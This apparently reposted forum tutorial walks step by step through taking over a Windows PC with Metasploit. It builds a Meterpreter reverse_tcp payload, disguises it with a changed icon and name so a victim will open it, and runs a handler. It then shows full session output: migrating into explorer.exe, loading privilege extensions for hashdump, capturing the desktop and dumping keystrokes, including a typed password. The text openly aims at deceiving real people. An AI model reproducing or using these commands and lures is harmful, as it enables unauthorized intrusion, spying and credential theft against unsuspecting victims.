Hey, I'm going to show you step by step how to come in to windows system easily. I used Backtrack 4 in this situation, but you can also use windows if you wan't to. What we are going to use is: Metasploit and Nmap. Just follow the step.
Download Metasploit on this site http://www.metasploit.com/download/ you can use it on windows or linux.
Install the program.
If it is only local network use your local IP address, if is it over internet, use your WAN IP address, you can see it from http://www.whatismyip.com/
start terminal/shell on backtrack.
If you made the payload right, it will come like this, if dosent show like this, you did it wrong. The payload.exe file will be on your desktop.
I suggest if you can download Icon Changer 3.8 and change the Icon and named something more interesting, then can you easily make somebody to open the file.
Download Icon Changer 3.8 here: http://www.shelllabs.com/iconchanger_download.htm
start metasploit, and choose your exploit and PAYLOAD. Do it like above.
See wich options you have.
We are going to use our Local IP address on this time. do that by open new terminal/shell.
Lets start to insert our IP and port. Let's get back to metasploit.
Make someone to open the payload.exe I recommend to download Icon Changer 3.8 and change the payload.exe icon an rename it, and then you can send it to somebody. After they open the file will it be like this.
We are going to migrate with explorer.exe now. type ps to see targets services.
I typed use priv to open hashdump or other things.
type sysinfo to see wich system it is. Is it helpful?
Take screenshot of targets desktop, remember after you make screenshot, the file is on your desktop.
You kan scan/listen targets what ever det type, by this.
don't wan't to wait for the host, you can just type the targets ip and port. My tutorials link is here http://www.hackforums.net/showthread.php?tid=1181486
I have another thread if you
Enjoy it!
Rate this and make comments.
Is it too difficult to understand? If it is, I think I can make it more understandable ;D
Download Metasploit on this site http://www.metasploit.com/download/ you can use it on windows or linux.
Install the program.
If it is only local network use your local IP address, if is it over internet, use your WAN IP address, you can see it from http://www.whatismyip.com/
start terminal/shell on backtrack.
Code:
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.113.201.34 LPORT=4444 x > /root/Payload.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=10.113.201.34,LPORT=4444
root@bt:~#
If you made the payload right, it will come like this, if dosent show like this, you did it wrong. The payload.exe file will be on your desktop.
I suggest if you can download Icon Changer 3.8 and change the Icon and named something more interesting, then can you easily make somebody to open the file.
Download Icon Changer 3.8 here: http://www.shelllabs.com/iconchanger_download.htm
start metasploit, and choose your exploit and PAYLOAD. Do it like above.
Code:
root@bt:~# msfconsole
__
< metasploit >
--
,__,
(oo)____
(__) )
||--|| *
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 575 exploits - 290 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r9959 updated 241 days ago (2010.08.05)
Warning: This copy of the Metasploit Framework was last updated 241 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) >
See wich options you have.
Code:
msf exploit(handler) > show options
Module options:
Name Current Setting Required Description
---- -- -- --
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- -- -- --
EXITFUNC process yes Exit technique: seh, thread, process
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
We are going to use our Local IP address on this time. do that by open new terminal/shell.
Code:
root@bt:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:32:56:46
inet addr:10.113.201.34 Bcast:10.113.201.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe32:5646/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:43 errors:0 dropped:0 overruns:0 frame:0
TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:5370 (5.3 KB) TX bytes:1152 (1.1 KB)
Interrupt:19 Base address:0x2000
Lets start to insert our IP and port. Let's get back to metasploit.
Code:
msf exploit(handler) > set LHOST 10.113.201.34
LHOST => 10.113.201.34
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 10.113.20
1.34:4444
[*] Starting the payload handler...
Make someone to open the payload.exe I recommend to download Icon Changer 3.8 and change the payload.exe icon an rename it, and then you can send it to somebody. After they open the file will it be like this.
Code:
[*] Started reverse handler on 10.113.201.34:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 10.113.201.59
[*] Meterpreter session 1 opened (10.113.201.34:4444 -> 10.113.201.59:7293) at 2011-04-03 22:44:14 -0200
meterpreter >
We are going to migrate with explorer.exe now. type ps to see targets services.
Code:
meterpreter > ps
Process list
==
PID Name Arch Session User Path
--- ---- ---- -- ---- ----
0 [System Process]
4 System
356 smss.exe
444 csrss.exe
508 wininit.exe
520 csrss.exe
556 services.exe
572 lsass.exe
580 lsm.exe
704 svchost.exe
768 nvvsvc.exe
808 svchost.exe
868 svchost.exe
900 svchost.exe
928 svchost.exe
1068 svchost.exe
1144 DisplayLinkManager.exe
1176 winlogon.exe
1316 Smc.exe
1400 nvvsvc.exe
1476 svchost.exe
1548 ccSvcHst.exe
1708 spoolsv.exe
1720 DisplayLinkUserAgent.exe
1752 svchost.exe
1992 svchost.exe
2040 IPROSetMonitor.exe
464 LVPrcSrv.exe
408 mdm.exe
940 svchost.exe
1140 Rtvscan.exe
1448 TeamViewer_Service.exe
2068 UltiDevCassinWebServer2a.exe
2144 vmware-usbarbitrator.exe
2268 vmnat.exe
2324 vmnetdhcp.exe
2360 vmware-authd.exe
2848 svchost.exe
2916 svchost.exe
3460 taskhost.exe x86 1 SERMERSOOQilin C:Windowssystem32taskhost.exe
3528 dwm.exe x86 1 SERMERSOOQilin C:Windowssystem32Dwm.exe
[b] 3580 explorer.exe x86 1 SERMERSOOQilin C:WindowsExplorer.EXE[/b]
3740 DisplayLinkUI.exe x86 1 SERMERSOOQilin C:Program FilesDisplayLink Core SoftwareDisplayLinkUI.exe
4080 hqtray.exe x86 1 SERMERSOOQilin C:Program FilesVMwareVMware Playerhqtray.exe
2304 SmcGui.exe x86 1
2084 AdobeARM.exe x86 1 SERMERSOOQilin C:Program FilesCommon FilesAdobeARM1.0AdobeARM.exe
2336 ccApp.exe x86 1 SERMERSOOQilin C:Program FilesCommon FilesSymantec SharedccApp.exe
2000 LWS.exe x86 1 SERMERSOOQilin C:Program FilesLogitechLogitech WebCam SoftwareLWS.exe
3832 PWRISOVM.EXE x86 1 SERMERSOOQilin C:Program FilesPowerISOPWRISOVM.EXE
4004 PrintScreen.exe x86 1 SERMERSOOQilin C:Program FilesGadwin SystemsPrintScreenPrintScreen.exe
1952 PRTG Windows GUI.exe x86 1 SERMERSOOQilin C:Program FilesPRTG Network MonitorPRTG Windows GUI.exe
1936 CUCore.exe x86 1 SERMERSOOQilin C:UsersilinAppDataLocalRadvisionConference Client7.10.1.169cucore.exe
2540 COCIManager.exe x86 1 SERMERSOOQilin C:Program FilesCommon FilesLogishrdLQCVFXCOCIManager.exe
4784 SearchIndexer.exe
2964 msnmsgr.exe x86 1 SERMERSOOQilin C:Program FilesWindows LiveMessengermsnmsgr.exe
6028 wlcomm.exe x86 1 SERMERSOOQilin C:Program FilesWindows LiveContactswlcomm.exe
5944 vmplayer.exe x86 1 SERMERSOOQilin C:Program FilesVMwareVMware Playervmplayer.exe
5096 firefox.exe x86 1 SERMERSOOQilin C:Program FilesMozilla Firefoxfirefox.exe
448 plugin-container.exe x86 1 SERMERSOOQilin C:Program FilesMozilla Firefoxplugin-container.exe
4488 vmware-vmx.exe
5200 Payload.exe x86 1 SERMERSOOQilin C:UsersilinDesktopPayload.exe
5696 notepad.exe x86 1 SERMERSOOQilin C:Windowssystem32notepad.exe
meterpreter > migrate 3580
[*] Migrating to 3580...
[*] Migration completed successfully.
meterpreter >
I typed use priv to open hashdump or other things.
Code:
meterpreter > use priv
Loading extension priv...success.
type sysinfo to see wich system it is. Is it helpful?
Code:
meterpreter > sysinfo
Computer: NUUMOB0088
OS : Windows 7 (Build 7600, ).
Arch : x86
Language: da_DK
meterpreter >
Take screenshot of targets desktop, remember after you make screenshot, the file is on your desktop.
Code:
meterpreter > screenshot
Screenshot saved to: /root/qgYuVeTx.jpeg
meterpreter > /usr/lib/firefox-3.0.15/firefox: symbol lookup error: /usr/lib/xulrunner-1.9.0.15/libxul.so: undefined symbol: sqlite3_enable_shared_cache
meterpreter >
You kan scan/listen targets what ever det type, by this.
Code:
meterpreter > keyscan_dump
Dumping captured keystrokes...
<LWin> rnotepad <Return> my password it Hahahahaha <Alt> <LMenu> <Tab>
meterpreter >
I have another thread if you
Enjoy it!
Rate this and make comments.
Is it too difficult to understand? If it is, I think I can make it more understandable ;D
No comments:
Post a Comment